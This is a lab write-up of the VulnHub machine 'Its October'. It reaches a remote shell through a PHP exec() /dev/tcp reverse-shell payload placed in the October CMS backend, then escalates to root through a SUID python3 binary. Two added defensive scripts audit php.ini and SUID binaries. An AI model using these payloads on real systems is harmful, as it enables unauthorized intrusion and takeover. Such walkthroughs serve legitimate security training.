[VULNHUB] Its October

Today we are going to hack the Vulnhub machine called Its October. You can download it from the following link: Its October

Enumeration


We start with an nmap scan to see which ports are open.

~ > nmap -A -p- 192.168.1.62
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-24 11:11 CEST
Nmap scan report for october.home (192.168.1.62)
Host is up (0.00031s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)
|   256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)
|_  256 95:1f:32:95:78:08:50:45:cd:8c:7c:71:4a:d4:6c:1c (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Homepage | My new websites
3306/tcp open  mysql   MySQL (unauthorized)
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: My Note
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.94 seconds
We visit http://192.168.1.62:8080/ and in the page source we find:

href="mynote.txt"
If we open the note at http://192.168.1.62:8080/mynote.txt we see that its content is:

user - admin
password - adminadmin2 
We save those credentials :) Next we run gobuster against port 80 to see if we can find anything interesting.

~ > gobuster -u http://192.168.1.62/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.62/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2020/08/24 11:15:40 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/0 (Status: 200)
/backend (Status: 302)
/config (Status: 301)
/index.php (Status: 200)
/modules (Status: 301)
/plugins (Status: 301)
/server-status (Status: 403)
/storage (Status: 301)
/themes (Status: 301)
/vendor (Status: 301)
=====================================================
2020/08/24 11:17:37 Finished
=====================================================
We see there is an interesting directory called "backend". We visit it and it asks for a username and password, so we use the ones we found earlier!

http://192.168.1.62/backend/backend/auth/signin
user: admin
password: adminadmin2
Once logged in, we go to: CMS -> Add -> Code. In the code section we put:

function onstart(){
    exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.59/7777 0>&1'");
}
We give "Filename" any name, set Layout to "Default", set the title to "shell" and click save. Then we start nc and leave it listening.

~ > nc -nlvp 7777
listening on [any] 7777 ...
With nc listening, we visit http://192.168.1.139/shell
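A defensive aside that is not part of the original write-up: the page above only becomes a shell because PHP's exec() is still callable from code the CMS lets an administrator edit. The script below is an added example that checks a php.ini for the usual process-execution functions in disable_functions; the two ini files it inspects are constructed samples, and the function names are assumptions made for this example, not anything from October CMS or Debian.

```shell
#!/bin/sh
# Added example (not from the original write-up): report which PHP
# process-execution functions a php.ini leaves callable.
# The ini files written below are constructed samples.

DANGEROUS="exec shell_exec system passthru proc_open popen"

# Print the value of disable_functions from an ini file (empty if unset).
disable_functions_value() {
    # Last uncommented assignment wins; drop the key, whitespace and quotes.
    grep -E '^[[:space:]]*disable_functions[[:space:]]*=' "$1" | tail -n 1 \
        | sed -e 's/^[^=]*=//' -e 's/[[:space:]"]//g'
}

# Print, space separated, the dangerous functions NOT present in disable_functions.
missing_disabled_functions() {
    value=$(disable_functions_value "$1")
    missing=""
    for fn in $DANGEROUS; do
        case ",$value," in
            *",$fn,"*) ;;                       # already disabled
            *) missing="$missing $fn" ;;
        esac
    done
    echo "${missing# }"
}

# Return 0 when every dangerous function is disabled, 1 otherwise.
check_php_ini() {
    m=$(missing_disabled_functions "$1")
    if [ -z "$m" ]; then
        echo "$1: OK, process-execution functions are disabled"
        return 0
    fi
    echo "$1: NOT hardened, still callable: $m"
    return 1
}

# Constructed sample 1: the weak setting (nothing disabled, which is what
# a reverse shell via exec() relies on).
WEAK_INI=$(mktemp)
cat > "$WEAK_INI" <<'EOF'
; php.ini (constructed sample, weak)
disable_functions =
EOF

# Constructed sample 2: the corrected setting.
HARDENED_INI=$(mktemp)
cat > "$HARDENED_INI" <<'EOF'
; php.ini (constructed sample, hardened)
disable_functions = "exec,shell_exec,system,passthru,proc_open,popen,pcntl_exec"
EOF
trap 'rm -f "$WEAK_INI" "$HARDENED_INI"' EXIT

check_php_ini "$WEAK_INI" || true
check_php_ini "$HARDENED_INI"
```

On a real host you would point check_php_ini at the ini file reported by `php --ini` for the Apache SAPI; disabling these functions does not stop every abuse of an admin account that can edit server-side code, but it removes the one-liner shown above and forces an attacker into noisier paths.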

Low Shell


We get our reverse shell :)

~ > nc -nlvp 7777
listening on [any] 7777 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.62] 44046
bash: cannot set terminal process group (451): Inappropriate ioctl for device
bash: no job control in this shell
www-data@october:/var/www/html/octobercms$ 
Once inside, we check whether there is any SUID binary that can help us escalate privileges.

bash-5.0$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/bin/newgrp
/usr/bin/su
/usr/bin/python3.7m
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/mount
/usr/bin/umount
/usr/bin/python3.7
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
bash-5.0$ 

Privilege Escalation


We see that python3.7m is SUID, so we can use it to get a privileged shell!

bash-5.0$ python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
bash-5.0# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
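From the defender's side, the whole escalation rests on one setuid bit that should never have been on an interpreter. As an added example (not part of the original write-up), the script below audits a list of SUID binaries: interpreters are flagged outright, and anything outside a baseline of what Debian ships setuid is reported as unexpected. The baseline is an assumption for this example, and the sample list is the find output from this write-up embedded as a constructed string.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag SUID binaries that are
# interpreters or that fall outside an expected baseline.

# Assumed baseline of setuid binaries on a stock Debian 10 install.
BASELINE="/usr/bin/newgrp /usr/bin/su /usr/bin/passwd /usr/bin/chfn
/usr/bin/chsh /usr/bin/mount /usr/bin/umount /usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper"

# Return 0 if the path is in the baseline.
in_baseline() {
    for b in $BASELINE; do
        [ "$b" = "$1" ] && return 0
    done
    return 1
}

# Return 0 if the file name looks like a scripting-language interpreter.
is_interpreter() {
    case "$(basename "$1")" in
        python*|perl*|ruby*|php*|node*|lua*) return 0 ;;
        *) return 1 ;;
    esac
}

# Read one SUID path per line on stdin and print one line per finding:
# "INTERPRETER <path>" or "UNEXPECTED <path>". Baseline entries are silent.
audit_suid() {
    while IFS= read -r path; do
        [ -z "$path" ] && continue
        if is_interpreter "$path"; then
            echo "INTERPRETER $path"
        elif ! in_baseline "$path"; then
            echo "UNEXPECTED $path"
        fi
    done
}

# Constructed sample: the find output from this write-up.
SAMPLE_SUID="/usr/bin/newgrp
/usr/bin/su
/usr/bin/python3.7m
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/mount
/usr/bin/umount
/usr/bin/python3.7
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper"

# Run the audit over the constructed sample.
audit_sample() {
    printf '%s\n' "$SAMPLE_SUID" | audit_suid
}

audit_sample
# On a live host:  find / -perm -4000 -type f 2>/dev/null | audit_suid
```

Every line the audit prints is a candidate for `chmod u-s` and, if a service genuinely needs the bit, for a review of why; the two python entries here are exactly what turned www-data into euid 0 above.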

proof.txt


Finally, we read the root flag!

bash-5.0# cat proof.txt
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq

End


And with that we are root on the machine.